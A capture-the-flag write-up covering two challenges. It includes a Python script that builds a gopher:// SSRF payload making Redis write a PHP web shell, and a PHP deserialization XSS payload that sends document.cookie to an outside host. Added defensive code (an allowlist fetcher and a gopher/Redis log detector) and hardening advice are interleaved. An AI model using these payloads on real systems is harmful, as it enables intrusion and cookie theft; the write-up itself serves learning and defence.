Redis and SSRF: https://xz.aliyun.com/t/1800
Extending the attack surface with the Gopher protocol: https://blog.chaitin.cn/gopher-attack-surfaces/
[GKCTF2020]EZ三剑客-EzWeb
First, visit ?secret to obtain the machine's local IP information.
The search box on the home page can be used to include (read) files. Trying the file:// protocol gets blocked, but file:/ works, which shows the filter is not strict. So read file:/var/www/html/index.php directly to get the source:
<?php
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}
if(isset($_GET['submit'])){
    $url = $_GET['url'];
    //echo $url."\n";
    if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {
        //var_dump($match);
        die('别这样');
    }
    curl($url);
}
if(isset($_GET['secret'])){
    system('ifconfig');
}
?>
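As an added example (not the challenge's code), here is the same fetch endpoint rewritten so that the check is an allowlist rather than a string blacklist. The challenge's regex looks for the literal `file://`, so `file:/` slips past it, and it never mentions gopher:// at all; an allowlist on scheme, a check of the address the host actually resolves to, and telling curl itself which protocols it may speak close all of these at once. It assumes PHP 7 or later with the curl extension, and the function names are mine.

```php
<?php
// Added example: allowlist-based replacement for the challenge's curl() + regex
// blacklist. Not the challenge's code. Assumes PHP >= 7 with the curl extension.

// True when every address for $host is publicly routable. IP literals are checked
// directly; hostnames are resolved with gethostbynamel() (A records). The list of
// addresses is handed back through $ips so the caller can pin the connection.
function resolves_to_public_address(string $host, array &$ips = []): bool {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];                      // IP literal, nothing to resolve
    } else {
        $ips = gethostbynamel($host) ?: [];  // false on lookup failure -> []
    }
    if ($ips === []) {
        return false;
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE rejects RFC 1918 and fc00::/7; NO_RES_RANGE rejects
        // loopback, link-local, 0.0.0.0/8 and other reserved blocks.
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

// Validate a user-supplied URL for server-side fetching. Returns the parsed
// parts (plus the checked IP) on success, or a string saying why it was rejected.
function validate_fetch_url(string $url) {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return 'unparseable URL or no host';  // file:/... has no host at all
    }
    $parts['scheme'] = strtolower($parts['scheme']);
    // Allowlist schemes instead of blacklisting strings such as "file://".
    if (!in_array($parts['scheme'], ['http', 'https'], true)) {
        return 'scheme not allowed';          // gopher, dict, file, ftp ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return 'credentials in URL not allowed';
    }
    if (isset($parts['port']) && !in_array((int)$parts['port'], [80, 443], true)) {
        return 'port not allowed';            // keeps 6379 and friends out
    }
    $host = trim($parts['host'], '[]');       // parse_url keeps [] on IPv6 literals
    if (!resolves_to_public_address($host, $ips)) {
        return 'host resolves to a private or reserved address';
    }
    $parts['resolved_ip'] = $ips[0];
    return $parts;
}

function safe_curl(string $url): string {
    $parts = validate_fetch_url($url);
    if (is_string($parts)) {
        http_response_code(400);
        return "rejected: {$parts}";
    }
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Tell curl itself which protocols it may speak, so even a bypass of the
    // URL check cannot reach gopher://, dict:// or file:.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    // Do not follow redirects: a public host could 302 to an internal address.
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    // Pin the connection to the address we just checked (DNS rebinding defence).
    $port = $parts['port'] ?? ($parts['scheme'] === 'https' ? 443 : 80);
    curl_setopt($ch, CURLOPT_RESOLVE, ["{$parts['host']}:{$port}:{$parts['resolved_ip']}"]);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? '' : $body;
}

if (isset($_GET['submit'])) {
    echo safe_curl($_GET['url'] ?? '');
}
```

With this in place, `file:/var/www/html/index.php` is rejected because it has no host, `gopher://...:6379/_...` because the scheme is not on the allowlist, and anything resolving to 127.0.0.1 or the 173.118.207.x range because of the address check. The resolved address is also pinned with CURLOPT_RESOLVE, so a hostname cannot pass validation with a public A record and then re-resolve to an internal one when curl connects.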
Combined with the local IP obtained earlier, the flag is probably on another host in the internal network, so use BurpSuite to scan the internal hosts. It turns out to be on the .11 host, with a hint that you need to find the service on a certain port. Continue scanning ports with Burp and find Redis on port 6379. Since a Redis service running on an internal network is very likely running as root, try writing a shell. The Gopher protocol is used here; the script below converts Redis protocol commands into gopher format:
from urllib import parse

protocol = "gopher://"
ip = "173.118.207.11"  # IP of the host running redis
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "shell.php"
path = "/var/www/html"
passwd = ""
# ${IFS} stands in for the spaces inside the shell string so that the split on " "
# in redis_format() keeps it as a single argument; it is turned back into spaces there.
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # Encode one command as a RESP array: "*<argc>\r\n" followed by
    # "$<len>\r\n<arg>\r\n" for every argument.
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    # Percent-encode each RESP command and append it to the gopher selector.
    for x in cmd:
        payload += parse.quote(redis_format(x))
    print(payload)
Finally, visit shell.php on the internal target host that runs Redis.
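The following is an added example from the defender's side, not part of the write-up: it does the reverse of the script above. Given a gopher:// URL found in a web-server access log or WAF capture, it decodes the percent-encoded selector back into RESP, splits it into the individual Redis commands, and flags the `CONFIG SET dir` / `CONFIG SET dbfilename` / `SAVE` sequence that turns a dump file into a web shell. The sample URL is constructed inline with a placeholder address (10.0.0.11) so the example runs offline; the function names are mine.

```php
<?php
// Added example (not from the write-up): decode a gopher:// SSRF URL back into the
// Redis commands it would deliver, and flag the ones that rewrite the RDB path.

// Parse RESP (the Redis wire protocol) into a list of commands, each a list of
// bulk strings. Only arrays of bulk strings are handled, which is all a client
// sends. Returns null on malformed input.
function parse_resp_commands(string $raw): ?array {
    $commands = [];
    $pos = 0;
    $len = strlen($raw);
    while ($pos < $len) {
        if ($raw[$pos] !== '*') return null;
        $eol = strpos($raw, "\r\n", $pos);
        if ($eol === false) return null;
        $count = (int)substr($raw, $pos + 1, $eol - $pos - 1);
        $pos = $eol + 2;
        $argv = [];
        for ($i = 0; $i < $count; $i++) {
            if ($pos >= $len || $raw[$pos] !== '$') return null;
            $eol = strpos($raw, "\r\n", $pos);
            if ($eol === false) return null;
            $blen = (int)substr($raw, $pos + 1, $eol - $pos - 1);
            $pos = $eol + 2;
            if ($pos + $blen + 2 > $len) return null;
            $argv[] = substr($raw, $pos, $blen);
            $pos += $blen + 2;                 // skip the bulk string and its CRLF
        }
        $commands[] = $argv;
    }
    return $commands;
}

// Extract the raw bytes embedded in a gopher URL. The selector is everything after
// the "/" that follows host:port; the write-up's script prefixes it with "_" (a
// gopher item-type byte that Redis simply ignores) and percent-encodes the rest.
function gopher_payload(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || strtolower($parts['scheme'] ?? '') !== 'gopher'
            || !isset($parts['path'])) {
        return null;
    }
    $selector = substr($parts['path'], 1);     // drop the leading "/"
    if ($selector !== '' && $selector[0] === '_') {
        $selector = substr($selector, 1);      // drop the item-type byte
    }
    return rawurldecode($selector);
}

// Findings for commands that change where and under what name Redis writes its
// dump file, or that wipe/replicate the data set. Matching is case-insensitive.
function flag_rdb_rewrite(array $commands): array {
    $findings = [];
    foreach ($commands as $argv) {
        $name = strtoupper($argv[0] ?? '');
        $sub  = strtoupper($argv[1] ?? '');
        $arg  = strtolower($argv[2] ?? '');
        if ($name === 'CONFIG' && $sub === 'SET' && in_array($arg, ['dir', 'dbfilename'], true)) {
            $findings[] = "CONFIG SET {$arg} " . ($argv[3] ?? '');
        } elseif (in_array($name, ['SAVE', 'BGSAVE', 'FLUSHALL', 'SLAVEOF', 'REPLICAOF'], true)) {
            $findings[] = $name;
        }
    }
    return $findings;
}

// Constructed sample input (placeholder host 10.0.0.11). A tiny RESP encoder is
// used only to build it here; in practice the URL comes straight from a log line.
function resp_encode(array $argv): string {
    $out = '*' . count($argv) . "\r\n";
    foreach ($argv as $a) {
        $out .= '$' . strlen($a) . "\r\n" . $a . "\r\n";
    }
    return $out;
}
$sample = 'gopher://10.0.0.11:6379/_' . rawurlencode(
    resp_encode(['config', 'set', 'dir', '/var/www/html'])
    . resp_encode(['config', 'set', 'dbfilename', 'shell.php'])
    . resp_encode(['save']));

$commands = parse_resp_commands(gopher_payload($sample) ?? '') ?? [];
foreach ($commands as $argv) {
    echo implode(' ', $argv), "\n";
}
print_r(flag_rdb_rewrite($commands));
```

The write succeeds on the challenge box because Redis accepts CONFIG SET from an unauthenticated client and runs with write access to the web root. Besides catching such URLs at the SSRF layer, the standard Redis-side mitigations are `protected-mode yes`, binding to a loopback or private interface only, `requirepass`, `rename-command CONFIG ""` so CONFIG SET is unavailable to clients, and running the service as a dedicated low-privilege user whose dump directory is not served by the web server.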
[BJDCTF 2nd]xss之光
First, visiting /.git/ reveals a git leak; after dumping it, we get the source:
<?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a);
https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label2
Because there is an echo, consider deserializing a native class that implements __toString(). Since the flag is stored in the cookie, simply grab document.cookie:
<?php
$a = new Exception('"<script>window.open(\'http://www.baidu.com/?\'+document.cookie);</script>');
echo urlencode(serialize($a));